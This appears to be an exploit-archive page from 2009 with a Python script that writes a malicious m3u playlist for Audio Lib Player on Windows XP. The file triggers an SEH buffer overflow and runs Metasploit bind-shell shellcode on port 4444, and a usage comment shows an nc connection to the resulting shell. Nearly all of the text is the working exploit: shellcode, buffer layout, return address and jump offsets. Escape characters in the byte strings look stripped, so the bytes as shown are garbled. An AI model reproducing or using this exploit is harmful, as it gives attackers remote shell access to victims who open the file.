[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)
# Published : 2009-09-09
# Author : Blake
# Previous Title : GemStone/S 6.3.1 (stoned) Local Buffer Overflow Exploit
# Next Title : Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)
# Audio Lib Player m3u SEH overwrite
# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm
# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Documents and SettingsblakeDesktopALP>
import sys
print "n[*] Audio Lib Player m3u SEH Overwrite"
print "[*] Written by Blake"
print "[*] Tested on Windows XP SP3n"
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"xddxc1xd9x74x24xf4x5fx57x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx42x4ax4ax4bx50x4dx4ax48x4bx49x4bx4fx4bx4f"
"x4bx4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx47"
"x35x47x4cx4cx4bx43x4cx45x55x43x48x45x51x4ax4f"
"x4cx4bx50x4fx45x48x4cx4bx51x4fx47x50x45x51x4a"
"x4bx51x59x4cx4bx46x54x4cx4bx45x51x4ax4ex46x51"
"x49x50x4ax39x4ex4cx4cx44x49x50x44x34x45x57x49"
"x51x49x5ax44x4dx45x51x48x42x4ax4bx4bx44x47x4b"
"x46x34x47x54x47x58x43x45x4dx35x4cx4bx51x4fx46"
"x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx45x51x4ax4bx44x43x46x4cx4cx4bx4b"
"x39x42x4cx51x34x45x4cx43x51x49x53x50x31x49x4b"
"x45x34x4cx4bx51x53x46x50x4cx4bx51x50x44x4cx4c"
"x4bx42x50x45x4cx4ex4dx4cx4bx51x50x43x38x51x4e"
"x45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx48"
"x56x42x46x50x53x43x56x43x58x50x33x50x32x43x58"
"x43x47x43x43x47x42x51x4fx51x44x4bx4fx48x50x45"
"x38x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx4ex36"
"x51x4fx4bx39x4dx35x45x36x4dx51x4ax4dx43x38x44"
"x42x50x55x43x5ax44x42x4bx4fx4ex30x43x58x49x49"
"x43x39x4cx35x4ex4dx50x57x4bx4fx48x56x51x43x46"
"x33x46x33x46x33x50x53x50x43x51x43x51x53x50x53"
"x4bx4fx48x50x42x46x42x48x42x31x51x4cx43x56x46"
"x33x4cx49x4bx51x4dx45x45x38x4ex44x44x5ax42x50"
"x48x47x51x47x4bx4fx49x46x43x5ax44x50x46x31x46"
"x35x4bx4fx4ex30x42x48x4ex44x4ex4dx46x4ex4dx39"
"x50x57x4bx4fx49x46x51x43x51x45x4bx4fx4ex30x45"
"x38x4bx55x51x59x4bx36x51x59x50x57x4bx4fx49x46"
"x46x30x46x34x50x54x51x45x4bx4fx48x50x4dx43x45"
"x38x4ax47x43x49x48x46x44x39x50x57x4bx4fx48x56"
"x50x55x4bx4fx48x50x43x56x42x4ax45x34x43x56x43"
"x58x43x53x42x4dx4cx49x4ax45x43x5ax50x50x46x39"
"x46x49x48x4cx4bx39x4dx37x43x5ax50x44x4cx49x4b"
"x52x46x51x49x50x4bx43x4ex4ax4bx4ex47x32x46x4d"
"x4bx4ex51x52x46x4cx4ax33x4cx4dx43x4ax50x38x4e"
"x4bx4ex4bx4ex4bx43x58x44x32x4bx4ex4ex53x45x46"
"x4bx4fx43x45x47x34x4bx4fx4ex36x51x4bx46x37x51"
"x42x50x51x50x51x50x51x43x5ax43x31x50x51x46x31"
"x51x45x50x51x4bx4fx48x50x45x38x4ex4dx48x59x43"
"x35x48x4ex46x33x4bx4fx4ex36x42x4ax4bx4fx4bx4f"
"x46x57x4bx4fx48x50x4cx4bx46x37x4bx4cx4bx33x49"
"x54x45x34x4bx4fx48x56x46x32x4bx4fx4ex30x45x38"
"x4cx30x4dx5ax44x44x51x4fx50x53x4bx4fx49x46x4b"
"x4fx48x50x41x41")
payload = "x41" * 420 # seh overwritten at 1224
nops = "x90" * 100 # Nop Sled
sc = shellcode # bind shell 695 bytes
near_jmp = "xe9x10xfdxffxff" # near jump back -752 bytes
seh = "x6ax19x9ax0f" # 0x0f9a196a pop ebp; pop ebx; ret from [C:WINDOWSsystem32VBAJET32.dll]
next_seh = "xebxf9xffxff" # short jump back -7
junk = "x43" * 572 # junk buffer
print "[+] Creating malicious playlist"
try:
file = open("exploit.m3u",'w')
file.write(payload + nops + sc + near_jmp + next_seh + seh + junk)
file.close()
print "[+] File created successfully"
except:
print "[x] Could not create file"
sys.exit(0)
# www.Syue.com [2009-09-09]